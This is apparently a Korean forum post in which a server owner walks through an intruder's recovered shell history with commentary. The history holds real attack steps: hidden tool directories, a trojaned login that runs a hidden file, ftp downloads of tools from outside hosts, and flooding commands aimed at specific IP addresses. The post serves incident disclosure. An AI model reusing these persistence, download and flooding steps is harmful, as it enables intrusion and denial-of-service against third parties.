제 서버가 당한것입니다.
굳이 설명이 붙이자면...
w
-> 누가 접속해 있었는지 궁금했나 봅니다.
cd /usr/man/man
cd .man
cd /usr/manman8 <- 바보가 오타를 냈군요
cd .man
cd /usr/man/man8
cd .man
cd /usr/man
cd man8
-> man파일인것처럼 꾸밀려고 man8에 .man을 만들었군요.
ls -lsa <- 잘 만들어졌나 보고
ssh -l root -v -C xxx.xxx.xxx.xxx -p 222
ssh -l root -v -C xxx.xxx.xxx.xxx -p 22
-> 딴짓을 할려고 했었군요.
updatedb &
-> 접속한 사람의 정보를 저장하는 툴하나 띄우고
locate .s
locate smurf
cat /dev/dsx
-> 예전에 자신이 숨긴 해킹툴이 잘 있나 검사했군요.
cd /root
mkdir .cache
cd .cache
echo "3 .hd" >/dev/dsx
echo "3 s" >>/dev/dsx
echo "3 smurf">>/dev/dsx
-> /dev/dsx 이라는 파일을 만들어 접속하면 위의 3개의 파일을 실행하게 지
정했습니다.
smurf도 유명한 해킹툴으로 지정된 곳의 호스트를 패킷들로 인해 시스템의
부하를 증가시킵니다.
즉 제 서버가 다른 서버를 자동공격하는 하나의 부대가 되었던 셈이죠..나쁜
것들..흑..
ftp club3d.ro
-> 툴들을 가져왔겠죠
chmod +x *
./s 1.1.1.1 195.138.125.217 1 1024 &
./s 1.1.1.1 195.138.125.217 1 1024 &
./s 1.1.1.1 212.90.163.65 1 1024 &
-> 쩝...
w -> 의심이 났나..
./s 1.1.1.1 195.138.125.30 1 1024 &
-> 으구.. 또 쩝..
w -> 또 의심을
killall -9 s
w -> 또...
netstat -a -t
netstat -a -t- -/
netstat -a -t- -/
netstat -a -t -/
netstat -a -t
ftp cyberg.net
-> 정보를 가져갔나 봅니다.
rm -rf take.tgz
-> 다 쓰고 원파일을 지웁니다.
exit
제 서버는 hosts.allow 만으로 사용자를 제안했었습니다.
이 해커는 tcp.log라는 파일이 남는 보편적인 프로그램을 사용했는데
다시 접속해서는 로그파일을 다르게 만들게 컴파일 해놓고 사라지곤합니다
쩝... /dex/dsx 파일을 띄우는것은 /bin/login 파일을 변경해서
실행하게 했으며 string 으로 login을 살펴보면 위의 dsx실행에 관한
문구가 들어있었습니다..
여기저기 보면 해킹막는것에 대해서 이야기하고는 있지만 자세하게
차근차근 알려주는 곳이 없더군요.
하우투를 봐도 거의 번역해 논것들 뿐이라 봐도 이해가 안가..--;;